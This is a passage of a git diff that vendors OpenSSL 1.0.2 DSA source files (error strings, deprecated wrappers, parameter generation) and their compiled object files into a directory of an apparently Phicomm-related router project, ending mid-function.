+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * This file contains deprecated function(s) that are now wrappers to the new
+ * version(s).
+ */
+
+#undef GENUINE_DSA
+
+#ifdef GENUINE_DSA
+/*
+ * Parameter generation follows the original release of FIPS PUB 186,
+ * Appendix 2.2 (i.e. use SHA as defined in FIPS PUB 180)
+ */
+# define HASH    EVP_sha()
+#else
+/*
+ * Parameter generation follows the updated Appendix 2.2 for FIPS PUB 186,
+ * also Appendix 2.2 of FIPS PUB 186-1 (i.e. use SHA as defined in FIPS PUB
+ * 180-1)
+ */
+# define HASH    EVP_sha1()
+#endif
+
+static void *dummy = &dummy;
+
+#ifndef OPENSSL_NO_SHA
+
+# include <stdio.h>
+# include <time.h>
+# include "cryptlib.h"
+# include <openssl/evp.h>
+# include <openssl/bn.h>
+# include <openssl/dsa.h>
+# include <openssl/rand.h>
+# include <openssl/sha.h>
+
+# ifndef OPENSSL_NO_DEPRECATED
+DSA *DSA_generate_parameters(int bits,
+                             unsigned char *seed_in, int seed_len,
+                             int *counter_ret, unsigned long *h_ret,
+                             void (*callback) (int, int, void *),
+                             void *cb_arg)
+{
+    BN_GENCB cb;
+    DSA *ret;
+
+    if ((ret = DSA_new()) == NULL)
+        return NULL;
+
+    BN_GENCB_set_old(&cb, callback, cb_arg);
+
+    if (DSA_generate_parameters_ex(ret, bits, seed_in, seed_len,
+                                   counter_ret, h_ret, &cb))
+        return ret;
+    DSA_free(ret);
+    return NULL;
+}
+# endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_depr.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_depr.o
new file mode 100644
index 0000000000000000000000000000000000000000..11b24b63970ab2e674ec8a18209a3edf10550e43
GIT binary patch
literal 1984
zcmbu9%}*0S6u_q~2nvkVaA<-tdss=0vT4Oc<e+S6%hoJHr1cxuEnTPqO0(UD;z39V
zCX<SC^dInlF!9nv5)R&tM-L_%V@!xK@iX||b_bTaz359`-+RBE_h#nJOqUaC((m&T
zE<SRB>_wasveL5W583Vz=^~xv%i-fc<ZGjBOTH?z*K#JszRKwg`#qtsSIX+A0i~K2
ziz-vac7=6|Ii=ciA`IyYi;LlC?E_Xyu}x*IW~G#Bx2RTOWSniM*qg1m7{ryZ&nkPb
zu(TLb*+;A-jI!_J%6eQ3jobM*Z>-hI9WW>neP;uu3dM6ue|;*ewGLM|2UPa<)}(w}
zo|Ny%+DkGrJUl3bGud*%DhubOeksxyJy*8F=z}v6DRTB?9m6Vc`$5oF(2>g-;wPkr
zEC7nqT{pyc{|fO{g1(;4w)PEJej4~O=i3XkNg90OPtefgK!OVEEeRTa)GE`+!vn)~
zV6|<87X8<0B}rF&Nm`L<F;55LG$PY*j0!OtiqT+<wmbE_40f!AZ0~q|3wWL^?t$-O
ze^$WW^?rs?fE@T6+Ptj^_g-<p?&kiKP6&^>)@k<)m<WpfZ<Ij*UOd)>Pd4GxO*qMw
zbS-BTO=*h6CuD8LC>W-08Cp>{^?AcG%o5Q?)UlYXYGcXdL?W%F<(Qh#?9l~dv00X8
zRP0aFreP3GD_Q!~tTvUO)u#1(bA()k^`PJ#>j3?=Q<r6gAjq*-oNpimLEZ(*`7?wd
z$SEl20{AF!k8QOB{E<pa^Ol|kYngSM=bmZI>5^qsEF$G}OD9scR3g&U!u-5Z09IJA
z3<=&wpS>3+o+*^2qPb8sOlyfqb_FA^O=ItNr~DsBfMmS$jW==#7z)2X^{76U`)GSW
zu{T4YZh7iFiMtLw1QzGvH#y|+UWYfnpr6k7MuRonavB1x`LFp=$i<owP`B{;Pq`uZ
ze12~6{cztswATxIjJ*U5Up?L<w}hR1!41LZ{o^<b4i0V1SDgGJAL!V|e0<Md=l9KN
zC_g7WKg{L%oO{iUQ$2U)&pQ_1;6aakWQ}JBhzJf`#K0v^xm|JuJg@v9ZVCkc3ie53
F{vWv6<B<RW

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_err.c
new file mode 100644
index 0000000..f5ddc66
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_err.c
@@ -0,0 +1,133 @@
+/* crypto/dsa/dsa_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2013 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/dsa.h>
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(ERR_LIB_DSA,func,0)
+# define ERR_REASON(reason) ERR_PACK(ERR_LIB_DSA,0,reason)
+
+static ERR_STRING_DATA DSA_str_functs[] = {
+    {ERR_FUNC(DSA_F_D2I_DSA_SIG), "d2i_DSA_SIG"},
+    {ERR_FUNC(DSA_F_DO_DSA_PRINT), "DO_DSA_PRINT"},
+    {ERR_FUNC(DSA_F_DSAPARAMS_PRINT), "DSAparams_print"},
+    {ERR_FUNC(DSA_F_DSAPARAMS_PRINT_FP), "DSAparams_print_fp"},
+    {ERR_FUNC(DSA_F_DSA_BUILTIN_PARAMGEN2), "DSA_BUILTIN_PARAMGEN2"},
+    {ERR_FUNC(DSA_F_DSA_DO_SIGN), "DSA_do_sign"},
+    {ERR_FUNC(DSA_F_DSA_DO_VERIFY), "DSA_do_verify"},
+    {ERR_FUNC(DSA_F_DSA_GENERATE_KEY), "DSA_generate_key"},
+    {ERR_FUNC(DSA_F_DSA_GENERATE_PARAMETERS_EX),
+     "DSA_generate_parameters_ex"},
+    {ERR_FUNC(DSA_F_DSA_NEW_METHOD), "DSA_new_method"},
+    {ERR_FUNC(DSA_F_DSA_PARAM_DECODE), "DSA_PARAM_DECODE"},
+    {ERR_FUNC(DSA_F_DSA_PRINT_FP), "DSA_print_fp"},
+    {ERR_FUNC(DSA_F_DSA_PRIV_DECODE), "DSA_PRIV_DECODE"},
+    {ERR_FUNC(DSA_F_DSA_PRIV_ENCODE), "DSA_PRIV_ENCODE"},
+    {ERR_FUNC(DSA_F_DSA_PUB_DECODE), "DSA_PUB_DECODE"},
+    {ERR_FUNC(DSA_F_DSA_PUB_ENCODE), "DSA_PUB_ENCODE"},
+    {ERR_FUNC(DSA_F_DSA_SIGN), "DSA_sign"},
+    {ERR_FUNC(DSA_F_DSA_SIGN_SETUP), "DSA_sign_setup"},
+    {ERR_FUNC(DSA_F_DSA_SIG_NEW), "DSA_SIG_new"},
+    {ERR_FUNC(DSA_F_DSA_SIG_PRINT), "DSA_SIG_PRINT"},
+    {ERR_FUNC(DSA_F_DSA_VERIFY), "DSA_verify"},
+    {ERR_FUNC(DSA_F_I2D_DSA_SIG), "i2d_DSA_SIG"},
+    {ERR_FUNC(DSA_F_OLD_DSA_PRIV_DECODE), "OLD_DSA_PRIV_DECODE"},
+    {ERR_FUNC(DSA_F_PKEY_DSA_CTRL), "PKEY_DSA_CTRL"},
+    {ERR_FUNC(DSA_F_PKEY_DSA_KEYGEN), "PKEY_DSA_KEYGEN"},
+    {ERR_FUNC(DSA_F_SIG_CB), "SIG_CB"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA DSA_str_reasons[] = {
+    {ERR_REASON(DSA_R_BAD_Q_VALUE), "bad q value"},
+    {ERR_REASON(DSA_R_BN_DECODE_ERROR), "bn decode error"},
+    {ERR_REASON(DSA_R_BN_ERROR), "bn error"},
+    {ERR_REASON(DSA_R_DATA_TOO_LARGE_FOR_KEY_SIZE),
+     "data too large for key size"},
+    {ERR_REASON(DSA_R_DECODE_ERROR), "decode error"},
+    {ERR_REASON(DSA_R_INVALID_DIGEST_TYPE), "invalid digest type"},
+    {ERR_REASON(DSA_R_INVALID_PARAMETERS), "invalid parameters"},
+    {ERR_REASON(DSA_R_MISSING_PARAMETERS), "missing parameters"},
+    {ERR_REASON(DSA_R_MODULUS_TOO_LARGE), "modulus too large"},
+    {ERR_REASON(DSA_R_NEED_NEW_SETUP_VALUES), "need new setup values"},
+    {ERR_REASON(DSA_R_NON_FIPS_DSA_METHOD), "non fips dsa method"},
+    {ERR_REASON(DSA_R_NO_PARAMETERS_SET), "no parameters set"},
+    {ERR_REASON(DSA_R_PARAMETER_ENCODING_ERROR), "parameter encoding error"},
+    {ERR_REASON(DSA_R_Q_NOT_PRIME), "q not prime"},
+    {0, NULL}
+};
+
+#endif
+
+void ERR_load_DSA_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+
+    if (ERR_func_error_string(DSA_str_functs[0].error) == NULL) {
+        ERR_load_strings(0, DSA_str_functs);
+        ERR_load_strings(0, DSA_str_reasons);
+    }
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_err.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_err.o
new file mode 100644
index 0000000000000000000000000000000000000000..6a25f08703040e9ac28d1c436e8c240bf43d9171
GIT binary patch
literal 1360
zcmbtS%}T>S5S|$SD_F&YP?302(Jrk&h#sU;s}~We2wo(lZEVFhEy)(tgT6u^#YZUk
z0zQUE#hVwMX?D}?S`l<$GBe-KH$T~Z$Q>OF7zRi&U>CZPL;+3)x_+kPW?%wh@IE>J
z@dSt2?2ff`R%m*>X>GH0mP)3#nw>Cxzm{UDjpY!ALFC3!hfoiX&j8D|2{TbiW<mqT
zT^@{^xRIC`8ExS}gwKgH;{GPI!yvqU_RBN-Zb&mIODaS&noa@HH9K4MVicJ${2lDz
zBR}Bu2YMxj;j}Vmv~wwNY}fZ$5pwywU9CGMd;fIL4!D2il>@Lu8QP?08y4KwxKjXz
znW3#nkGnS<SjpiIutE?3E7of@*F(&!bC=;YB?ImhuSHz;nylg18?Mi9f%$ILVQ$5~
z^qrb3n*YNjkV|)`|G|u?8T|(lQ?4ot7!W4klRV2wN3%MA5zj|a|H@xQF4at-sv`TZ
zs37{XzqFeQrlvO3K=CC{Lez&|S<l^LEcq7ts?e^gTwp*ob$&}E>3iw?bIhaHoDuob
zJc~hR1u%w|=9GMi_v=lRHhoZDLj&VzsfNxcOusv#Jc|An1&RnbLZ;B`$A1xt<tQ_B
Gbp98Ty-%3{

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_gen.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_gen.c
new file mode 100644
index 0000000..8920036
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_gen.c
@@ -0,0 +1,754 @@
+/* crypto/dsa/dsa_gen.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#undef GENUINE_DSA
+
+#ifdef GENUINE_DSA
+/*
+ * Parameter generation follows the original release of FIPS PUB 186,
+ * Appendix 2.2 (i.e. use SHA as defined in FIPS PUB 180)
+ */
+# define HASH    EVP_sha()
+#else
+/*
+ * Parameter generation follows the updated Appendix 2.2 for FIPS PUB 186,
+ * also Appendix 2.2 of FIPS PUB 186-1 (i.e. use SHA as defined in FIPS PUB
+ * 180-1)
+ */
+# define HASH    EVP_sha1()
+#endif
+
+#include <openssl/opensslconf.h> /* To see if OPENSSL_NO_SHA is defined */
+
+#ifndef OPENSSL_NO_SHA
+
+# include <stdio.h>
+# include "cryptlib.h"
+# include <openssl/evp.h>
+# include <openssl/bn.h>
+# include <openssl/rand.h>
+# include <openssl/sha.h>
+# include "dsa_locl.h"
+
+# ifdef OPENSSL_FIPS
+/* Workaround bug in prototype */
+#  define fips_dsa_builtin_paramgen2 fips_dsa_paramgen_bad
+#  include <openssl/fips.h>
+# endif
+
+int DSA_generate_parameters_ex(DSA *ret, int bits,
+                               const unsigned char *seed_in, int seed_len,
+                               int *counter_ret, unsigned long *h_ret,
+                               BN_GENCB *cb)
+{
+# ifdef OPENSSL_FIPS
+    if (FIPS_mode() && !(ret->meth->flags & DSA_FLAG_FIPS_METHOD)
+        && !(ret->flags & DSA_FLAG_NON_FIPS_ALLOW)) {
+        DSAerr(DSA_F_DSA_GENERATE_PARAMETERS_EX, DSA_R_NON_FIPS_DSA_METHOD);
+        return 0;
+    }
+# endif
+    if (ret->meth->dsa_paramgen)
+        return ret->meth->dsa_paramgen(ret, bits, seed_in, seed_len,
+                                       counter_ret, h_ret, cb);
+# ifdef OPENSSL_FIPS
+    else if (FIPS_mode()) {
+        return FIPS_dsa_generate_parameters_ex(ret, bits,
+                                               seed_in, seed_len,
+                                               counter_ret, h_ret, cb);
+    }
+# endif
+    else {
+        const EVP_MD *evpmd;
+        size_t qbits = bits >= 2048 ? 256 : 160;
+
+        if (bits >= 2048) {
+            qbits = 256;
+            evpmd = EVP_sha256();
+        } else {
+            qbits = 160;
+            evpmd = EVP_sha1();
+        }
+
+        return dsa_builtin_paramgen(ret, bits, qbits, evpmd,
+                                    seed_in, seed_len, NULL, counter_ret,
+                                    h_ret, cb);
+    }
+}
+
+int dsa_builtin_paramgen(DSA *ret, size_t bits, size_t qbits,
+                         const EVP_MD *evpmd, const unsigned char *seed_in,
+                         size_t seed_len, unsigned char *seed_out,
+                         int *counter_ret, unsigned long *h_ret, BN_GENCB *cb)
+{
+    int ok = 0;
+    unsigned char seed[SHA256_DIGEST_LENGTH];
+    unsigned char md[SHA256_DIGEST_LENGTH];
+    unsigned char buf[SHA256_DIGEST_LENGTH], buf2[SHA256_DIGEST_LENGTH];
+    BIGNUM *r0, *W, *X, *c, *test;
+    BIGNUM *g = NULL, *q = NULL, *p = NULL;
+    BN_MONT_CTX *mont = NULL;
+    int i, k, n = 0, m = 0, qsize = qbits >> 3;
+    int counter = 0;
+    int r = 0;
+    BN_CTX *ctx = NULL;
+    unsigned int h = 2;
+
+    if (qsize != SHA_DIGEST_LENGTH && qsize != SHA224_DIGEST_LENGTH &&
+        qsize != SHA256_DIGEST_LENGTH)
+        /* invalid q size */
+        return 0;
+
+    if (evpmd == NULL)
+        /* use SHA1 as default */
+        evpmd = EVP_sha1();
+
+    if (bits < 512)
+        bits = 512;
+
+    bits = (bits + 63) / 64 * 64;
+
+    /*
+     * NB: seed_len == 0 is special case: copy generated seed to seed_in if
+     * it is not NULL.
+     */
+    if (seed_len && (seed_len < (size_t)qsize))
+        seed_in = NULL;         /* seed buffer too small -- ignore */
+    if (seed_len > (size_t)qsize)
+        seed_len = qsize;       /* App. 2.2 of FIPS PUB 186 allows larger
+                                 * SEED, but our internal buffers are
+                                 * restricted to 160 bits */
+    if (seed_in != NULL)
+        memcpy(seed, seed_in, seed_len);
+
+    if ((ctx = BN_CTX_new()) == NULL)
+        goto err;
+
+    if ((mont = BN_MONT_CTX_new()) == NULL)
+        goto err;
+
+    BN_CTX_start(ctx);
+    r0 = BN_CTX_get(ctx);
+    g = BN_CTX_get(ctx);
+    W = BN_CTX_get(ctx);
+    q = BN_CTX_get(ctx);
+    X = BN_CTX_get(ctx);
+    c = BN_CTX_get(ctx);
+    p = BN_CTX_get(ctx);
+    test = BN_CTX_get(ctx);
+
+    if (!BN_lshift(test, BN_value_one(), bits - 1))
+        goto err;
+
+    for (;;) {
+        for (;;) {              /* find q */
+            int seed_is_random;
+
+            /* step 1 */
+            if (!BN_GENCB_call(cb, 0, m++))
+                goto err;
+
+            if (!seed_len) {
+                RAND_pseudo_bytes(seed, qsize);
+                seed_is_random = 1;
+            } else {
+                seed_is_random = 0;
+                seed_len = 0;   /* use random seed if 'seed_in' turns out to
+                                 * be bad */
+            }
+            memcpy(buf, seed, qsize);
+            memcpy(buf2, seed, qsize);
+            /* precompute "SEED + 1" for step 7: */
+            for (i = qsize - 1; i >= 0; i--) {
+                buf[i]++;
+                if (buf[i] != 0)
+                    break;
+            }
+
+            /* step 2 */
+            if (!EVP_Digest(seed, qsize, md, NULL, evpmd, NULL))
+                goto err;
+            if (!EVP_Digest(buf, qsize, buf2, NULL, evpmd, NULL))
+                goto err;
+            for (i = 0; i < qsize; i++)
+                md[i] ^= buf2[i];
+
+            /* step 3 */
+            md[0] |= 0x80;
+            md[qsize - 1] |= 0x01;
+            if (!BN_bin2bn(md, qsize, q))
+                goto err;
+
+            /* step 4 */
+            r = BN_is_prime_fasttest_ex(q, DSS_prime_checks, ctx,
+                                        seed_is_random, cb);
+            if (r > 0)
+                break;
+            if (r != 0)
+                goto err;
+
+            /* do a callback call */
+            /* step 5 */
+        }
+
+        if (!BN_GENCB_call(cb, 2, 0))
+            goto err;
+        if (!BN_GENCB_call(cb, 3, 0))
+            goto err;
+
+        /* step 6 */
+        counter = 0;
+        /* "offset = 2" */
+
+        n = (bits - 1) / 160;
+
+        for (;;) {
+            if ((counter != 0) && !BN_GENCB_call(cb, 0, counter))
+                goto err;
+
+            /* step 7 */
+            BN_zero(W);
+            /* now 'buf' contains "SEED + offset - 1" */
+            for (k = 0; k <= n; k++) {
+                /*
+                 * obtain "SEED + offset + k" by incrementing:
+                 */
+                for (i = qsize - 1; i >= 0; i--) {
+                    buf[i]++;
+                    if (buf[i] != 0)
+                        break;
+                }
+
+                if (!EVP_Digest(buf, qsize, md, NULL, evpmd, NULL))
+                    goto err;
+
+                /* step 8 */
+                if (!BN_bin2bn(md, qsize, r0))
+                    goto err;
+                if (!BN_lshift(r0, r0, (qsize << 3) * k))
+                    goto err;
+                if (!BN_add(W, W, r0))
+                    goto err;
+            }
+
+            /* more of step 8 */
+            if (!BN_mask_bits(W, bits - 1))
+                goto err;
+            if (!BN_copy(X, W))
+                goto err;
+            if (!BN_add(X, X, test))
+                goto err;
+
+            /* step 9 */
+            if (!BN_lshift1(r0, q))
+                goto err;
+            if (!BN_mod(c, X, r0, ctx))
+                goto err;
+            if (!BN_sub(r0, c, BN_value_one()))
+                goto err;
+            if (!BN_sub(p, X, r0))
+                goto err;
+
+            /* step 10 */
+            if (BN_cmp(p, test) >= 0) {
+                /* step 11 */
+                r = BN_is_prime_fasttest_ex(p, DSS_prime_checks, ctx, 1, cb);
+                if (r > 0)
+                    goto end;   /* found it */
+                if (r != 0)
+                    goto err;
+            }
+
+            /* step 13 */
+            counter++;
+            /* "offset = offset + n + 1" */
+
+            /* step 14 */
+            if (counter >= 4096)
+                break;
+        }
+    }
+ end:
+    if (!BN_GENCB_call(cb, 2, 1))
+        goto err;
+
+    /* We now need to generate g */
+    /* Set r0=(p-1)/q */
+    if (!BN_sub(test, p, BN_value_one()))
+        goto err;
+    if (!BN_div(r0, NULL, test, q, ctx))
+        goto err;
+
+    if (!BN_set_word(test, h))
+        goto err;
+    if (!BN_MONT_CTX_set(mont, p, ctx))
+        goto err;
+
+    for (;;) {
+        /* g=test^r0%p */
+        if (!BN_mod_exp_mont(g, test, r0, p, ctx, mont))
+            goto err;
+        if (!BN_is_one(g))
+            break;
+        if (!BN_add(test, test, BN_value_one()))
+            goto err;
+        h++;
+    }
+
+    if (!BN_GENCB_call(cb, 3, 1))
+        goto err;
+
+    ok = 1;
+ err:
+    if (ok) {
+        if (ret->p)
+            BN_free(ret->p);
+        if (ret->q)
+            BN_free(ret->q);
+        if (ret->g)
+            BN_free(ret->g);
+        ret->p = BN_dup(p);
+        ret->q = BN_dup(q);
+        ret->g = BN_dup(g);
+        if (ret->p == NULL || ret->q == NULL || ret->g == NULL) {
+            ok = 0;
+            goto err;
+        }
+        if (counter_ret != NULL)
+            *counter_ret = counter;
+        if (h_ret != NULL)
+            *h_ret = h;
+        if (seed_out)
+            memcpy(seed_out, seed, qsize);
+    }
+    if (ctx) {
+        BN_CTX_end(ctx);
+        BN_CTX_free(ctx);
+    }
+    if (mont != NULL)
+        BN_MONT_CTX_free(mont);
+    return ok;
+}
+
+# ifdef OPENSSL_FIPS
+#  undef fips_dsa_builtin_paramgen2
+extern int fips_dsa_builtin_paramgen2(DSA *ret, size_t L, size_t N,
+                                      const EVP_MD *evpmd,
+                                      const unsigned char *seed_in,
+                                      size_t seed_len, int idx,
+                                      unsigned char *seed_out,
+                                      int *counter_ret, unsigned long *h_ret,
+                                      BN_GENCB *cb);
+# endif
+
+/*
+ * This is a parameter generation algorithm for the DSA2 algorithm as
+ * described in FIPS 186-3.
+ */
+
+int dsa_builtin_paramgen2(DSA *ret, size_t L, size_t N,
+                          const EVP_MD *evpmd, const unsigned char *seed_in,
+                          size_t seed_len, int idx, unsigned char *seed_out,
+                          int *counter_ret, unsigned long *h_ret,
+                          BN_GENCB *cb)
+{
+    int ok = -1;
+    unsigned char *seed = NULL, *seed_tmp = NULL;
+    unsigned char md[EVP_MAX_MD_SIZE];
+    int mdsize;
+    BIGNUM *r0, *W, *X, *c, *test;
+    BIGNUM *g = NULL, *q = NULL, *p = NULL;
+    BN_MONT_CTX *mont = NULL;
+    int i, k, n = 0, m = 0, qsize = N >> 3;
+    int counter = 0;
+    int r = 0;
+    BN_CTX *ctx = NULL;
+    EVP_MD_CTX mctx;
+    unsigned int h = 2;
+
+# ifdef OPENSSL_FIPS
+
+    if (FIPS_mode())
+        return fips_dsa_builtin_paramgen2(ret, L, N, evpmd,
+                                          seed_in, seed_len, idx,
+                                          seed_out, counter_ret, h_ret, cb);
+# endif
+
+    EVP_MD_CTX_init(&mctx);
+
+    if (evpmd == NULL) {
+        if (N == 160)
+            evpmd = EVP_sha1();
+        else if (N == 224)
+            evpmd = EVP_sha224();
+        else
+            evpmd = EVP_sha256();
+    }
+
+    mdsize = EVP_MD_size(evpmd);
+    /* If unverificable g generation only don't need seed */
+    if (!ret->p || !ret->q || idx >= 0) {
+        if (seed_len == 0)
+            seed_len = mdsize;
+
+        seed = OPENSSL_malloc(seed_len);
+
+        if (seed_out)
+            seed_tmp = seed_out;
+        else
+            seed_tmp = OPENSSL_malloc(seed_len);
+
+        if (!seed || !seed_tmp)
+            goto err;
+
+        if (seed_in)
+            memcpy(seed, seed_in, seed_len);
+
+    }
+
+    if ((ctx = BN_CTX_new()) == NULL)
+        goto err;
+
+    if ((mont = BN_MONT_CTX_new()) == NULL)
+        goto err;
+
+    BN_CTX_start(ctx);
+    r0 = BN_CTX_get(ctx);
+    g = BN_CTX_get(ctx);
+    W = BN_CTX_get(ctx);
+    X = BN_CTX_get(ctx);
+    c = BN_CTX_get(ctx);
+    test = BN_CTX_get(ctx);
+
+    /* if p, q already supplied generate g only */
+    if (ret->p && ret->q) {
+        p = ret->p;
+        q = ret->q;
+        if (idx >= 0)
+            memcpy(seed_tmp, seed, seed_len);
+        goto g_only;
+    } else {
+        p = BN_CTX_get(ctx);
+        q = BN_CTX_get(ctx);
+    }
+
+    if (!BN_lshift(test, BN_value_one(), L - 1))
+        goto err;
+    for (;;) {
+        for (;;) {              /* find q */
+            unsigned char *pmd;
+            /* step 1 */
+            if (!BN_GENCB_call(cb, 0, m++))
+                goto err;
+
+            if (!seed_in) {
+                if (RAND_pseudo_bytes(seed, seed_len) < 0)
+                    goto err;
+            }
+            /* step 2 */
+            if (!EVP_Digest(seed, seed_len, md, NULL, evpmd, NULL))
+                goto err;
+            /* Take least significant bits of md */
+            if (mdsize > qsize)
